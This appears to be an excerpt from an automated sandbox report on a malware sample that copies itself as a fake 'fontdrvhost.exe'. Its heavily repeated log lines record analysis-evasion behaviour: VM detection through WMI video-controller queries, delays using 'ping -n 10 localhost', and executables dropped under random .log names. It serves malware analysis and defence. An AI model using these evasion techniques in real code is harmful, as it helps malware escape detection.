                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Uses ping.exe to sleep
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeMemory allocated: 1280000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeMemory allocated: 1B0B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1A840000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1B110000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1670000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1B180000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1550000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1AEF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: E10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1AAB0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: F70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1ACA0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1190000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1AB90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1800000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1B4D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1360000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1ADF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: A20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1A750000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: B60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMemory allocated: 1A620000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD3600 rdtsc 0_2_00007FFD9BBD3600
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\IsWIxvZJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\fzXEwQRC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\auteTnDC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zTojkKNX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\AaPSReOe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\uztLDTCs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\hezDLgou.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CkrRJHNx.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\tIxJOpqh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\bYjfzcZg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\xOrrZDRn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\yEAAOeyR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\WvXEaKPX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ntFcgnCN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\feqUKmVF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\bAJNFhyM.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\WAZwZzli.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\BxnIYuRz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\EQFIYaOX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\fLnmpTPV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\RMfXVWDe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\nJodFojJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\EOpBrqDR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\UbSwNisy.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\aYVnMXzh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\RnzHiPIs.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\RMCoLrQk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\uRiBlhjd.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\qxbJOXLg.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\PCgnLZlk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CGTrJaEm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YMjefUJa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\hRSCUTxn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CgRzmzKC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\HuSZzPsz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\LovAYRCw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\inkviYhq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\pzYaRqdW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\piqUgtXk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\hJcmyZDP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\QkEpPQey.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\eCwwaQCH.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\tAOrkGQb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\qiKKKJQB.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\lThKWNPp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\cnAeDqUL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ELDRalsN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\oTDkKMId.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ipFMCTyG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\IdUqmnRm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\DACRVJoK.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\IbKgwPay.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\avWEvUWS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ldamqVhj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YsHvxEyH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\KWVhlfdm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\aABfDneW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YnJNkaiG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\KOmOGvDg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zldaSYtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\FvSbvlyH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\mbeUnBPt.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\MLVQXpXH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\NmOPODYO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\JavyIngh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YBjETBXN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\pntLeisv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\KszgdGmQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\aLYWFcdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\fuaVjmBB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\pMKkuPam.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\VPWFywnw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\JvAHRkKP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\XzKOkXsR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\VWGgLdif.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\YVGePHcW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\DQsQlVoZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\HlvZPcYC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\lCADkPID.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CTQIQVae.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\GspafaHt.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\CdkYHFFH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\RraOLYZw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\TORFqFIZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\TWBYVoif.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\zntiAIEO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\dbVNVLdb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\maCuLVwe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\wOXBumXW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\RRcFiATg.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeDropped PE file which has not been started: C:\Users\user\Desktop\THFECrua.logJump to dropped file
